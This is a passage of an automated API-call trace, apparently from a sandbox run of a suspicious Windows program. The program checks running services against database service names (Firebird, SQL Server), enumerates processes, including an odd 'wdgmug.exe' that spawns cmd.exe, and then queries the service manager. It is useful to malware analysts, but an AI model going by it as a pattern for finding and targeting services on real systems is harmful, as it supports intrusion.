[0295.931] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0295.931] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0295.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0295.931] lstrlenW (lpString="NlaSvc") returned 6 [0295.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0295.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0295.931] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0295.931] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0295.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0295.932] lstrlenW (lpString="nsi") returned 3 [0295.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0295.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0295.932] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0295.932] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0295.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0295.932] lstrlenW (lpString="PcaSvc") returned 6 [0295.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0295.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0295.932] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0295.932] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0295.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0295.932] lstrlenW (lpString="PlugPlay") returned 8 [0295.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0295.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0295.932] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0295.932] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0295.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0295.932] lstrlenW (lpString="Power") returned 5 [0295.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0295.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0295.932] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0295.932] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0295.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0295.932] lstrlenW (lpString="ProfSvc") returned 7 [0295.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0295.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0295.933] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0295.933] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0295.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0295.933] lstrlenW (lpString="RpcEptMapper") returned 12 [0295.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0295.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0295.933] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0295.933] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0295.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0295.933] lstrlenW (lpString="RpcSs") returned 5 [0295.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0295.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0295.933] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0295.933] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0295.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0295.933] lstrlenW (lpString="SamSs") returned 5 [0295.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0295.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0295.933] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0295.933] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0295.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0295.933] lstrlenW (lpString="Schedule") returned 8 [0295.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0295.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0295.934] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0295.934] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0295.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0295.934] lstrlenW (lpString="SecurityHealthService") returned 21 [0295.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0295.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0295.934] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0295.934] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0295.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0295.934] lstrlenW (lpString="SENS") returned 4 [0295.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0295.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0295.934] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0295.934] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0295.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0295.934] lstrlenW (lpString="ShellHWDetection") returned 16 [0295.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0295.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0295.934] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0295.934] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0295.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0295.934] lstrlenW (lpString="Spooler") returned 7 [0295.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0295.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0295.934] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0295.934] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0295.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0295.935] lstrlenW (lpString="StateRepository") returned 15 [0295.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0295.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0295.935] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0295.935] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0295.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0295.935] lstrlenW (lpString="SysMain") returned 7 [0295.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0295.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0295.935] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0295.935] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0295.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0295.935] lstrlenW (lpString="SystemEventsBroker") returned 18 [0295.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0295.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0295.935] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0295.935] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0295.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0295.935] lstrlenW (lpString="Themes") returned 6 [0295.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0295.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0295.935] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0295.935] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0295.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0295.935] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0295.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0295.936] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0295.936] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0295.936] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0295.936] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0295.936] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0295.936] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0295.936] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0295.936] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0295.936] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0295.936] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0295.936] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x37c [0295.945] Process32FirstW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.221] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0296.222] lstrlenW (lpString="System") returned 6 [0296.222] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0296.223] lstrlenW (lpString="smss.exe") returned 8 [0296.223] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0296.311] lstrlenW (lpString="csrss.exe") returned 9 [0296.311] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0296.312] lstrlenW (lpString="wininit.exe") returned 11 [0296.312] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0296.312] lstrlenW (lpString="csrss.exe") returned 9 [0296.312] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0296.313] lstrlenW (lpString="winlogon.exe") returned 12 [0296.313] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0296.313] lstrlenW (lpString="services.exe") returned 12 [0296.314] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0296.314] lstrlenW (lpString="lsass.exe") returned 9 [0296.314] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0296.315] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0296.315] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0296.315] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0296.315] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.316] lstrlenW (lpString="svchost.exe") returned 11 [0296.316] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.317] lstrlenW (lpString="svchost.exe") returned 11 [0296.317] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0296.317] lstrlenW (lpString="dwm.exe") returned 7 [0296.317] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.318] lstrlenW (lpString="svchost.exe") returned 11 [0296.318] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.318] lstrlenW (lpString="svchost.exe") returned 11 [0296.318] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.319] lstrlenW (lpString="svchost.exe") returned 11 [0296.319] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.319] lstrlenW (lpString="svchost.exe") returned 11 [0296.335] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.337] lstrlenW (lpString="svchost.exe") returned 11 [0296.337] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.338] lstrlenW (lpString="svchost.exe") returned 11 [0296.338] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.339] lstrlenW (lpString="svchost.exe") returned 11 [0296.339] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.339] lstrlenW (lpString="svchost.exe") returned 11 [0296.339] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.340] lstrlenW (lpString="svchost.exe") returned 11 [0296.340] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.341] lstrlenW (lpString="svchost.exe") returned 11 [0296.341] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0296.341] lstrlenW (lpString="spoolsv.exe") returned 11 [0296.341] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.342] lstrlenW (lpString="svchost.exe") returned 11 [0296.342] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0296.342] lstrlenW (lpString="audiodg.exe") returned 11 [0296.343] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0296.343] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0296.343] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0296.344] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0296.344] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0296.691] lstrlenW (lpString="Memory Compression") returned 18 [0296.691] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0296.692] lstrlenW (lpString="sihost.exe") returned 10 [0296.692] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.692] lstrlenW (lpString="svchost.exe") returned 11 [0296.692] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0296.693] lstrlenW (lpString="taskhostw.exe") returned 13 [0296.693] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x44, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0296.694] lstrlenW (lpString="explorer.exe") returned 12 [0296.694] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0296.694] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0296.694] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0296.695] lstrlenW (lpString="SearchUI.exe") returned 12 [0296.695] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0296.696] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0296.696] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0296.697] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0296.697] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0296.698] lstrlenW (lpString="wdgmug.exe") returned 10 [0296.698] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0296.698] lstrlenW (lpString="cmd.exe") returned 7 [0296.698] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0296.699] lstrlenW (lpString="conhost.exe") returned 11 [0296.699] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0296.700] lstrlenW (lpString="mode.com") returned 8 [0296.700] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0296.700] CloseHandle (hObject=0x37c) returned 1 [0296.700] Sleep (dwMilliseconds=0x1f4) [0297.540] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a0f8 [0297.541] EnumServicesStatusExW (in: hSCManager=0x401a0f8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0297.542] GetLastError () returned 0xea [0297.542] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc4) returned 0x4137f20 [0297.542] EnumServicesStatusExW (in: hSCManager=0x401a0f8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, 